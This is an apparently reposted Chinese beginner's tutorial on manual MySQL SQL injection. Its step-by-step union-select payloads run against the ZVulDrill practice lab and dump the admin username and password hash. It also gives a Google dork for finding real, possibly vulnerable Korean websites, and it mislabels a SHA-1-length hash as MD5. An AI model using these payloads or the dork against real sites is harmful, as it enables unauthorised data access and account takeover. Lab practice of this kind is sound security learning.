首页 >数据库 >mysql教程 >手动sql注入(初级篇)_MySQL

手动sql注入(初级篇)_MySQL

WBOY
WBOY原创
2016-06-01 13:06:361715浏览

我也是才学 sql 注入一个星期,此篇文章是学给初学者看的

推荐书籍 《sql注入攻击与防御》http://www.ddooo.com/softdown/50160.htm

1、找到存在sql注入的网站

  方法:在google中输入 site:kr inurl:php?id=    打开出现的网址,在网址后面添加 ’  (英文逗号)如果页面出现跳转 说明可能存在sql注入原理:一般网址都是类似  search.php?search=hello   相应的sql语句 可能是 select * from table_name where column_name='hello'   如果在网址后面添加 ‘   则sql语句为  select * from table_name where column_name='hello'’   如果网站没有进行sql注入过滤,会报错在GitHub有个Web漏洞演练项目,可以下载后部署在自己的电脑上(这里我就不教大家部署了,熟悉Web编程的大部分都会)        https://github.com/710leo/ZVulDrill网页内容如下

2、检测字段长度

(1) http://localhost/ZVulDrill-master/search.php?search=hello%' order by 1--%20相当于sql语句 select * from table_name where colmun_name like '%hello%' order by 1 -- '说明 MySQL有三种注释 -- 是其中一种 但是 -- 后面要跟一个空格才有效 但是网址会自动去掉最后一个空格需要手动输入%20注释后面的sql语句不执行(2)  此时页面没有出错,用同样的方式 添加 order by 10页面出错,然后 order by 5 出错,order by 4 页面正确 说明字段长  4

3、查看数据库信息

      方法:使用union语句提取数据      (1)   http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,2,4 --%20sql语句  select * from table_name where column_name like '%hello%' and 1=2 union select 1,2,3,4union前的sql语句中 where条件恒为假,结果集为空,整个sql语句返回的是union后面的结果集
   (2)  获取MySQL version user database 等相关信息   如上图所示,页面上显示 1,2 ,可以利用这个来显示我们需要的信息 http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,version(),user(),4 --%20  即  将 2,3 换成 version(),user()  页面如下
同理将 user() 换成 database()  得到数据库名  zvuldrilluser() ------------    wkdty@localhostversion()  --------------   5.6.17 (5.0以上的版本都带有一个 information_schema 的虚拟库里面存放的是所有库的信息.) database()   -------------  zvuldrill

4、获取数据库数据

 (1)获取表名http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT table_name),4 from information_schema.columns where table_schema='zvuldrill'--%20
数据库中有3张表,对我们最有用的是admin这张表,以管理员身份进入网站可以看到各种信息(2)获取字段名http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT column_name),4 from information_schema.columns where table_name='admin'--%20


(3)获取数据http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT admin_id,admin_name,admin_pass),4 from admin--%20

  admin_id 1 admin_name adminadmin_pass d033e22ae348aeb5660fc2140aec35850c4da997   (md5解密之后  得到admin)根据用户登录入口,找到后台登录入口  ,以管理员身份进入网站
声明:
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn